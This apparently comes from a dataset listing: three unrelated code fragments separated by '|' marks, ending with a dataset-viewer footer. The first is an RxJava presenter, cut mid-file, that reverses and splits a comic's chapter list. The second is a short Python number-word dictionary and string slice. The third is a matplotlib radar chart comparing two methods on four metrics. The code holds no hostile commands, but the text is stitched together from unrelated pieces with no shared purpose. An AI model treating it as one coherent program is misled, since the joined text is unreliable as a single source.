                .subscribe(new HttpRxObserver<>(new HttpRxObserver.IResult<ComicListDetail>() {
                    @Override
                    public void onSuccess(ComicListDetail comicListDetail) {
                        mRootView.showDetail(comicListDetail);
                        mRootView.hideLoading();
                    }

                    @Override
                    public void onError(ApiException e) {
                        // NOTE(review): the loading indicator is not hidden here — confirm
                        // whether handleError() is expected to dismiss it.
                        mRootView.handleError(e);
                    }
                }));
    }

    /**
     * Reverses the chapter order of the given detail off the main thread, then
     * re-splits the chapters into a "shown" list (first 52) and a "remaining"
     * list, and hands the updated model back to the view.
     * The mutation happens in place on the passed {@code comicListDetail}.
     *
     * @param comicListDetail the detail whose chapters should be reversed; may be null
     */
    @Override
    public void reverse(final ComicListDetail comicListDetail) {
        mRootView.showLoading();
        Observable.create(new ObservableOnSubscribe<ComicListDetail>() {
            @Override
            public void subscribe(ObservableEmitter<ComicListDetail> e) {
                if (comicListDetail != null && !ListUtils.isEmpty(comicListDetail.getChapters())) {
                    Collections.reverse(comicListDetail.getChapters());
                    List<ComicListDetail.ChaptersBean> mirrors = comicListDetail.getChapters();
                    // 52 appears to be the number of chapters shown inline before the
                    // "more" section — TODO confirm against the detail UI.
                    if (mirrors.size() > 52) {
                        comicListDetail.setShowChapters(new ArrayList<>(mirrors.subList(0, 52)));
                        comicListDetail.setLastChapters(new ArrayList<>(mirrors.subList(52, mirrors.size())));
                    }
                }
                // NOTE(review): onComplete() is never called and a null detail would make
                // onNext(null) fail under RxJava 2 — confirm callers never pass null.
                e.onNext(comicListDetail);
            }
        }).compose(RxUtlis.<ComicListDetail>toMain())
                .onErrorResumeNext(new HttpResultFunction<ComicListDetail>())
                .subscribe(new HttpRxObserver<>(new HttpRxObserver.IResult<ComicListDetail>() {
                    @Override
                    public void onSuccess(ComicListDetail comicListDetail) {
                        mRootView.hideLoading();
                        mRootView.reverse(comicListDetail);
                    }

                    @Override
                    public void onError(ApiException e) {
                        mRootView.handleError(e);
                    }
                }));
    }
}
|
# Map English number words to their integer values (1 through 10).
dictionary = dict(zip(
    ['one', 'two', 'three', 'four', 'five',
     'six', 'seven', 'eight', 'nine', 'ten'],
    range(1, 11),
))
# Demonstrate indexing into a str: position 5 of "Hello World"
# is the space separating the two words.
string = "Hello World"
output = string[5:6]  # length-1 slice, equivalent to string[5]
print(output)
"""
Create a radar chart to illustrate the performance of the data-driven methods
"""
from math import pi
import matplotlib.pyplot as plt
import pandas as pd

# Render text through LaTeX (needed for the $F_\beta$ spoke label) and enlarge fonts.
plt.rc('text', usetex=True)
plt.rcParams.update({'font.size': 14})

# One row per method; every column after 'group' is a metric plotted on a spoke.
df = pd.DataFrame({
    'group': ['DD-v2-03','DD-v1-03'],
    'nIoU': [0.772, 0.774],
    r"$F_\beta$": [0.900, 0.908],
    'MCC': [0.842, 0.817],
    'TPR': [0.88, 0.90]
})

# Metric names (all columns except 'group') and one evenly spaced angle per spoke.
categories = list(df)[1:]
N = len(categories)
angles = [n / float(N) * 2 * pi for n in range(N)]
angles += angles[:1]  # repeat the first angle so the polygon closes

ax = plt.subplot(111, polar=True)
ax.set_theta_offset(pi / 2)   # first spoke points straight up
ax.set_theta_direction(-1)    # spokes proceed clockwise
plt.xticks(angles[:-1], categories)

# Radial axis: grey tick labels at 0.7/0.8/0.9, plot range clipped to [0.6, 1].
ax.set_rlabel_position(0)
plt.yticks([0.7, 0.8, 0.9], ["0.7","0.8","0.9"], color="grey", size=10)
plt.ylim(0.6,1)

# First method (row 0): closed red polygon.
values = df.loc[0].drop('group').values.flatten().tolist()
values += values[:1]  # close the polygon to match the closed angle list
ax.plot(angles,
        values,
        color = '#FF0000',
        linewidth = 2,
        label = "DD-v2-03")

# Second method (row 1): closed black polygon.
values = df.loc[1].drop('group').values.flatten().tolist()
values += values[:1]
ax.plot(angles,
        values,
        color = '#000000',
        linewidth = 2,
        label = "DD-v1-03")

# NOTE(review): loc='upper right' combined with bbox_to_anchor=(0.1, 0.1) pins
# the legend's upper-right corner near the lower-left of the axes — confirm
# this placement is intentional.
plt.legend(loc='upper right', bbox_to_anchor=(0.1, 0.1))
plt.tight_layout()
plt.savefig('dd_radar_chart.pdf')
plt.show()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.